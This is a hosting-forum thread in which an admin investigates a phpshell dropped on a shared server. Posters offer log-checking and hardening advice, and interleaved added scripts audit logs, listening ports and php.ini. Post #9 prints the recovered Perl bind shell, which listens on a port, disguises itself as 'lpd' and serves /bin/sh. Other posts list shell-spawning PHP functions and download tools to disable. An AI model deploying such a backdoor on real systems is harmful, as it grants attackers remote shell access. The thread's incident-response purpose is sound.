  1. #1

    Server Hacked Again!

    On one of our servers I found a file in one of the clients' directories called phpshell! I got a notification when the user was trying to run it; I contacted the user and he denies it was him! Now I want to know if there is any possible way of putting this file there without having FTP! Does anyone know what it is?

  2. #2
    Yep, it's possible. Hackers can use insecure PHP files and wget (from your server) to grab just about any file they want and run it.

    phpshell is just what it sounds like - it is a PHP program that allows someone to open up a session just like SSH.

  3. #3
    So the user might be innocent? I looked at all his files; they are all HTML files, no PHP file except that one.

  4. #4
    Join Date
    Apr 2000
    It can be uploaded via any PHP script, or CGI script, or something insecure that runs SSI commands, FTP, shell, frontpage (if you offer it), a control panel interface or filemanager, etc. Also, that one script might be it. Someone also might have guessed their password. It's hard to say without checking the logs. Check the FTP logs to see if it was uploaded, their command history file if they have shell, control panel access logs, and web access logs and look for any indications there. Someone uploaded it somehow. Check the time stamp to see (if it's at all true) how long ago it was modified, unless you've removed it or modified it since.

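The log check described in the post above, as an added example that is not part of the thread or of any poster's code: given the name of the dropped file, find the FTP session that uploaded it and the client that then requested it over HTTP. The two logs are constructed samples in xferlog format (wu-ftpd/proftpd/pure-ftpd) and Apache combined format; the paths, IPs and account name are assumptions. In real use, point the functions at /var/log/xferlog and the client's access_log.

```shell
#!/bin/sh
# Added example (not from the thread). Given the name of a dropped file, find
# out who put it there: which FTP session uploaded it and which client then
# requested it over HTTP. Sample logs below are constructed; the paths, IPs
# and account name are assumptions.

SAMPLE_DIR=$(mktemp -d)

# Constructed xferlog: field 7 = remote host, 9 = path, 12 = direction
# (i = upload to the server, o = download), 14 = account name.
cat > "$SAMPLE_DIR/xferlog" <<'EOF'
Sat Oct 22 16:20:11 2005 1 203.0.113.9 1024 /home/client1/public_html/index.html a _ i r client1 ftp 0 * c
Sat Oct 22 16:53:20 2005 1 198.51.100.23 4102 /home/client1/public_html/img/phpshell.php b _ i r client1 ftp 0 * c
Sat Oct 22 17:02:45 2005 1 198.51.100.23 4102 /home/client1/public_html/img/phpshell.php b _ o r client1 ftp 0 * c
EOF

# Constructed Apache combined log: field 1 = client IP, 4 = timestamp,
# 6 = "METHOD, 7 = request path.
cat > "$SAMPLE_DIR/access_log" <<'EOF'
203.0.113.9 - - [22/Oct/2005:16:21:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.23 - - [22/Oct/2005:16:55:02 +0000] "GET /img/phpshell.php HTTP/1.1" 200 2310 "-" "Mozilla/4.0"
198.51.100.23 - - [22/Oct/2005:16:55:40 +0000] "POST /img/phpshell.php HTTP/1.1" 200 3871 "-" "Mozilla/4.0"
EOF

# ftp_uploads NAME XFERLOG
# Prints "timestamp ip account path" for every *incoming* transfer of NAME.
ftp_uploads() {
    awk -v name="$1" '$12 == "i" && index($9, name) { print $1, $2, $3, $4, $5, $7, $14, $9 }' "$2"
}

# web_hits NAME ACCESS_LOG
# Prints "ip timestamp method path" for every request whose path contains NAME.
web_hits() {
    awk -v name="$1" 'index($7, name) { m = $6; sub(/^"/, "", m); print $1, $4, m, $7 }' "$2"
}

# correlate NAME XFERLOG ACCESS_LOG
# Prints "ip account" for each IP that uploaded NAME over FTP *and* later
# requested it over HTTP: the clearest sign that the FTP password, not the
# user, is the problem.
correlate() {
    awk -v name="$1" '
        NR == FNR { if ($12 == "i" && index($9, name)) up[$7] = $14; next }
        index($7, name) && ($1 in up) && !seen[$1]++ { print $1, up[$1] }
    ' "$2" "$3"
}

echo "FTP uploads of phpshell.php:";    ftp_uploads phpshell.php "$SAMPLE_DIR/xferlog"
echo "HTTP requests for phpshell.php:"; web_hits phpshell.php "$SAMPLE_DIR/access_log"
echo "Uploaded and then used from:";    correlate phpshell.php "$SAMPLE_DIR/xferlog" "$SAMPLE_DIR/access_log"
```

The same idea applies to the other sources the post lists: a control-panel file manager or FrontPage upload leaves a line in its own log rather than in xferlog, so run the name search over every log that can write into the client's directory, and compare the timestamps you find against the file's mtime (stat -c %Y) before it is cleaned up.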
  5. #5
    Thank you so much for comments.
    I am using a program to stop hackers of this nature; the program has removed two files related to this incident. One is the phpshell.php from the client directory, the other is a .pl file which I have the source of. Is it safe if I post the source here?

  6. #6
    Join Date
    Apr 2000
    While a program or some type of scanning tool might help locate scripts that have a specific file name or string, you're going to have to manually check for any it didn't detect, since it's not possible for it to find all the scripts. You should consider taking some measures to prevent this from being repeated or to cause a problem on your server if someone (say a client even) tried to run it. I don't see why it would be a problem attaching the script to the thread/post, but I don't see the point.

  7. #7
    Join Date
    Apr 2005
    San Diego, CA
    Don't suspend his account, just flag it as a problem. Tell him you are deleting the PHP file and let it be. Experiencing high server load or anything suspicious?

  8. #8
    Join Date
    Mar 2003
    tail -f /var/log/nerd
    Seems like I am the activist for Chkrootkit and Root Kit Hunter lately... lol

    Anyway, go and download those two scripts and install them on your server. Set up a cron job to run them each night and to email you the findings. This will help you to determine whether your box has been rooted or not.

    Google "Chkrootkit" and "Root Kit Hunter" for the web site addresses of the scripts.

    Hopefully the scripts find nothing!

    Mega Hosters Inc. - The Last Host You Will Ever Need!
    Hsphere Control Panel, 24/7 Phone Support, EasyApp, Shared SSL, Daily Backups, Dedicated IPs, PHP4 & PHP5, FFMPEG, Legal Adult Content Allowed + More!
    Treating A Customer The Way They Should Be Treated For Over 5.5 Years Now!

  9. #9
    Thanks for the help,

    box is not rooted.
    This is the Perl script the hacker wanted to run from the tmp directory (a classic bind shell: it listens on a TCP port and hands whoever connects a /bin/sh; the body of the accept loop was cut off in the copy posted here):

```perl
#rintf "BS\n";
use Socket;                    # sockaddr_in, INADDR_ANY, PF_INET etc. come from here
$port= 57337;                  # TCP port the backdoor listens on
$proto= getprotobyname('tcp');
$cmd= "lpd";                   # name the process will show in ps
$system= 'echo "(`whoami`@`uname -n`:`pwd`)"; /bin/sh';   # banner, then an interactive shell
$0 = $cmd;                     # disguise the perl process as the printer daemon
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";   # every interface, not just localhost
listen(SERVER, SOMAXCONN)or die "listen: $!";
for(; $paddr = accept(CLIENT, SERVER); close CLIENT) {
    # wire the connecting client to stdin/stdout/stderr; the rest of the
    # loop body (where $system would be run) is missing from the post
    open(STDIN, ">&CLIENT");
    open(STDOUT, ">&CLIENT");
    open(STDERR, ">&CLIENT");
}
```

    Many thanks to the author of the script that stopped them:

    I was able to find out that the hacker was coming from RU. So far my guess is they had the FTP password somehow...

    Thanks again

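Two checks that would have exposed the bind shell above while it was running, as an added example (not from the thread or any poster): it listens on TCP 57337 on every interface, and it renames itself to "lpd" with $0 while the binary actually executing is still perl, which /proc/PID/exe still points at whatever name ps shows. Input is constructed sample output of `ss -ltnp` and a constructed "pid name exe" table of the kind you can build from /proc; the port allowlist and PIDs are assumptions. In real use, pipe in the live output.

```shell
#!/bin/sh
# Added example (not from the thread). Hunts for a backdoor like the Perl
# bind shell above: an unexpected listening port, and a process whose name
# does not match the program really running. Samples are constructed;
# EXPECTED_PORTS and the PIDs are assumptions.

# Ports this host is expected to listen on (assumption; adjust per server).
EXPECTED_PORTS="21 22 25 80 443 3306"

# Constructed `ss -ltnp` output.
SAMPLE_SS=$(cat <<'EOF'
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      128    *:80                *:*               users:(("httpd",pid=1204,fd=4))
LISTEN 0      128    0.0.0.0:57337       0.0.0.0:*         users:(("lpd",pid=31337,fd=3))
EOF
)

# Constructed table; on a live box build it with (kernel threads have no exe):
#   for p in /proc/[0-9]*; do echo "${p#/proc/} $(cat "$p/comm") $(readlink "$p/exe")"; done
SAMPLE_PROCS=$(cat <<'EOF'
812 sshd /usr/sbin/sshd
1204 httpd /usr/sbin/httpd
31337 lpd /usr/bin/perl
EOF
)

# stdin: `ss -ltnp` output. Prints "port process" for each listening socket
# whose port is not in EXPECTED_PORTS.
unexpected_listeners() {
    awk -v allow="$EXPECTED_PORTS" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $1 == "LISTEN" {
            port = $4; sub(/.*:/, "", port)             # "0.0.0.0:57337" -> "57337"
            proc = "?"
            if (match($0, /users:\(\("[^"]+"/)) {        # users:(("lpd",pid=...
                proc = substr($0, RSTART + 9, RLENGTH - 10)
            }
            if (!(port in ok)) print port, proc
        }'
}

# stdin: "pid name exe" lines. Prints processes whose name is not the basename
# of the executable they really run: a renamed perl or python script shows up
# here, a genuine lpd (/usr/sbin/lpd) does not.
disguised_processes() {
    awk 'NF == 3 {
        exe = $3; sub(/.*\//, "", exe)                  # /usr/bin/perl -> perl
        if ($2 != exe) print $1, $2, $3
    }'
}

echo "Listeners on unexpected ports:";          printf '%s\n' "$SAMPLE_SS" | unexpected_listeners
echo "Processes not named after their binary:"; printf '%s\n' "$SAMPLE_PROCS" | disguised_processes
```

Treat hits from the second check as leads, not verdicts: /proc/PID/comm is truncated to 15 characters, so long daemon names mismatch their binary, and a few daemons legitimately rename their children. A high port bound to 0.0.0.0 by something calling itself a printer daemon is worth a look every time, though, and neither check depends on a rootkit scanner's signature list.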
  10. #10
    Join Date
    Dec 2004
    New York, NY
    You might want to install Mod_Security which can prevent things like this (provided you use a good rule set).

    You can find an installation guide with a good ruleset here:

    Secondly, you may want to install BFD & APF Firewall to make things even more secure.

    BFD Installation Guide:
    APF Firewall Installation Guide:

    MediaLayer, LLC - Learn how we can make your website load faster, translating to better conversion rates for your business!
    The pioneers of optimized web hosting, featuring LiteSpeed Web Server & SSD Storage - Celebrating 10 Years in Business

  11. #11

    While I'm a firm believer in using both chkrootkit and root kit hunter, they detect ROOT KITS.

    They do not detect some of the other types of hacks; and this can lead to a false sense of security.

    Security needs to be done in practical, manageable layers which are checked throughout the day.

    Some of those layers should include securing /tmp, /var/tmp, /dev/shm (if Linux-based), setting root-only access to compilers and fetch-like utilities, and using mod_security with a good rule set that works with your customer and user base.

    Thank you.
    Peter M. Abraham
    LinkedIn Profile

  12. #12
    I have disabled wget & curl... it makes it harder for people to download binaries.

    You might wish to google... GRsecurity

  13. #13
    Join Date
    Feb 2004
    Southern California

  14. #14
    Join Date
    Feb 2002
    Unfortunately users often have weak passwords, and don't realise holes exist in popular scripts they use, even going as far as to think you'll keep their whole site up to date.

    Don't be too hard on them, but let them know the setup and policies you operate nonetheless.
    Matthew - Burton Hosting
    low cost shared, reseller, VPS & dedicated solutions for over five years - we've got what you need. - server monitoring service for all!

  15. #15
    Join Date
    Apr 2000
    I recommend setting policies for the passwords, so they will be rejected if they try and set them to a weak password. Of course, if you have a control panel interface that doesn't allow you to do this, it's probably not much of an option unless you consider creating your own addon/module with its API, if it has one, and replace the password change feature with your own.

  16. #16
    Disable PHP functions: system, shell_exec

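An audit of that setting, as an added example that is not part of the thread or any poster's code: it reads a php.ini and reports which of the process-spawning functions are still callable, so a dropped phpshell has nothing left to call. The two ini fragments are constructed, one as shipped (the directive present but empty) and one hardened; the function list is an assumption, trim it to what your customers' applications genuinely need.

```shell
#!/bin/sh
# Added example (not from the thread). Audits a php.ini for the functions a
# shared host should disable. Both ini fragments are constructed; the
# MUST_DISABLE list is an assumption.

MUST_DISABLE="system shell_exec exec passthru popen proc_open"

# Constructed php.ini as shipped: the directive is there but empty.
WEAK_INI=$(cat <<'EOF'
; php.ini as shipped
disable_functions =
allow_url_fopen = On
EOF
)

# Constructed hardened php.ini. disable_functions is PHP_INI_SYSTEM: it only
# takes effect here or in httpd.conf, a customer cannot undo it from
# .htaccess or ini_set().
HARDENED_INI=$(cat <<'EOF'
; hardened
disable_functions = system, shell_exec, exec, passthru, popen, proc_open ; no shells from PHP
allow_url_fopen = Off
EOF
)

# stdin: a php.ini. Prints each function from MUST_DISABLE that is not listed
# in disable_functions; prints nothing when the file is fully hardened.
# Commented-out lines (leading ';') are ignored, trailing comments stripped.
missing_disabled_functions() {
    awk -v want="$MUST_DISABLE" '
        BEGIN { n = split(want, w, " ") }
        /^[ \t]*disable_functions[ \t]*=/ {
            sub(/^[^=]*=[ \t]*/, "")                  # keep only the value
            sub(/[ \t]*;.*$/, "")                     # drop a trailing comment
            m = split($0, parts, /[ \t]*,[ \t]*/)
            for (i = 1; i <= m; i++) have[tolower(parts[i])] = 1
        }
        END { for (i = 1; i <= n; i++) if (!(w[i] in have)) print w[i] }'
}

echo "Still callable with the shipped php.ini:"
printf '%s\n' "$WEAK_INI" | missing_disabled_functions
echo "Still callable with the hardened php.ini:"
printf '%s\n' "$HARDENED_INI" | missing_disabled_functions
```

Disabling these functions stops PHP from spawning a shell; it does not stop a web shell from reading and writing whatever files the web server user can reach, which is why the earlier posts pair this with mod_security and a locked-down /tmp rather than relying on it alone. Run the check against every php.ini that is actually loaded (per-user ini files under CGI/suPHP setups count), not just the one in /etc.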
  17. #17
    Thank you every one for the help! Found the hole and fixed it.

  18. #18
    Which was... ?

  19. #19
    Join Date
    Apr 2000
    I wouldn't imagine the "hole" in this case was very relevant, as it was likely a script that allowed someone access, or a weak password. Perhaps I'm wrong about it, but I'd bet money it was a common cause that's not specific, like a vulnerable script.
